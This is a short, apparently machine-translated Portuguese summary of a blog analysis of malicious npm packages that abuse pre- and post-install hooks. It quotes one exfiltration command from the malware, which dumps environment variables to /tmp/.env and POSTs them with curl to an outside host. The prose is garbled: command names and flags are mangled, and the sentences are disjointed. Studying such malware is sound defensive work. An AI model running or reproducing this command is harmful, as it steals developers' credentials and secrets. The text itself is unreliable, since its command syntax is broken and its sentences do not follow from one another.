7 min de leitura
Os pacotes publicados no NPM podem declarar ganchos pré e pós-instalação, que são scripts que correm, bem, pré ou pós-instalação.Env> /tmp/.env;Curl -x post -d @/tmp/.env -h ‘x -bot: Nope’ https://www.pkgio.com/.x773/env.json: Este comando grava as variáveis de ambiente atuais no arquivo/tmp/.env, usando o comando Env.Cerca de 700K Package Versões no Registro da NPM atualmente declaram os scripts de instalação e, portanto, podem executar o código que compromete a segurança da sua máquina de desenvolvimento ou sua compilação de IC.Esse nome pode ser um nome de domínio totalmente qualificado (FQDN), que inclui o nome do domínio e o nome do host, ou pode ser apenas o nome do host.Os autores publicaram sete versões no total, cada uma explorando diferentes maneiras de explorar scripts de pré-instalação, incluindo baixar e executar o código Python.
Fonte: https://blog.sandworm.dev/dissecting-npm-malware-five-packages-and-their-evil-install-scripts